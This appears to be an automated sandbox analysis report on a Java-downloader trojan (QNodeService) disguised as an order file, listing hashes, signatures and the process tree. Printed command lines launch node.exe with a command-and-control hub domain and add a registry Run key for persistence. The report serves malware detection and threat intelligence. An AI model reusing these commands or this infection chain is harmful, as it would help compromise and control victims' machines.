Analysis
-
max time kernel
119s -
max time network
150s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
05-11-2020 15:32
Static task
static1
Behavioral task
behavioral1
Sample
Ordine Novembre.jar
Resource
win7v20201028
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
Ordine Novembre.jar
Resource
win10v20201028
windows10_x64
0 signatures
0 seconds
General
-
Target
Ordine Novembre.jar
-
Size
100KB
-
MD5
d3beaa3255348f63f93e0188f6e12312
-
SHA1
dba05de62887edcc29c0dbf0cbc84b1aadc80e99
-
SHA256
79b800668faba140b33637f63aa00bdb22773b4ddccb1b70a21e7d259d7b0ea4
-
SHA512
a5a76bdb75efc43c86548c0bf103a2db614cc4b513ecdacdc308273f09cee113511f27fd2fb5fd94bb66119c9ecf3e09445eb0b6d7f36b00cc0c09c5d776b65e
Score
10/10
Malware Config
Signatures
-
QNodeService
Trojan/stealer written in NodeJS and spread via Java downloader.
-
Executes dropped EXE 3 IoCs
pid Process 1360 node.exe 3308 node.exe 2824 node.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\fa76a2a6-c5e8-436f-bf84-6c274a87301c = "cmd /D /C \"C:\\Users\\Admin\\qhub\\node\\2.0.10\\boot.vbs\"" reg.exe -
JavaScript code in executable 3 IoCs
resource yara_rule behavioral2/files/0x000100000001ab77-174.dat js behavioral2/files/0x000100000001ab77-177.dat js behavioral2/files/0x000100000001ab77-181.dat js -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 21 wtfismyip.com 22 wtfismyip.com -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString node.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString node.exe -
Suspicious behavior: EnumeratesProcesses 18 IoCs
pid Process 1360 node.exe 1360 node.exe 1360 node.exe 1360 node.exe 3308 node.exe 3308 node.exe 3308 node.exe 3308 node.exe 2824 node.exe 2824 node.exe 2824 node.exe 2824 node.exe 2824 node.exe 2824 node.exe 2824 node.exe 2824 node.exe 2824 node.exe 2824 node.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 492 wrote to memory of 3644 492 java.exe 76 PID 492 wrote to memory of 3644 492 java.exe 76 PID 3644 wrote to memory of 1360 3644 javaw.exe 80 PID 3644 wrote to memory of 1360 3644 javaw.exe 80 PID 1360 wrote to memory of 3308 1360 node.exe 82 PID 1360 wrote to memory of 3308 1360 node.exe 82 PID 3308 wrote to memory of 2824 3308 node.exe 83 PID 3308 wrote to memory of 2824 3308 node.exe 83 PID 2824 wrote to memory of 2104 2824 node.exe 85 PID 2824 wrote to memory of 2104 2824 node.exe 85 PID 2104 wrote to memory of 3096 2104 cmd.exe 86 PID 2104 wrote to memory of 3096 2104 cmd.exe 86
Processes
-
C:\ProgramData\Oracle\Java\javapath\java.exejava -jar "C:\Users\Admin\AppData\Local\Temp\Ordine Novembre.jar"1⤵
- Suspicious use of WriteProcessMemory
PID:492 -
C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe"C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar C:\Users\Admin\AppData\Local\Temp\e1db5d24.tmp2⤵
- Suspicious use of WriteProcessMemory
PID:3644 -
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe - --hub-domain ciko77.hopto.org3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1360 -
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_2gfXXt\boot.js --hub-domain ciko77.hopto.org4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3308 -
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_2gfXXt\boot.js --hub-domain ciko77.hopto.org5⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2824 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "fa76a2a6-c5e8-436f-bf84-6c274a87301c" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\"""6⤵
- Suspicious use of WriteProcessMemory
PID:2104 -
C:\Windows\system32\reg.exeREG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "fa76a2a6-c5e8-436f-bf84-6c274a87301c" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\""7⤵
- Adds Run key to start application
PID:3096
-
-
-
-
-
-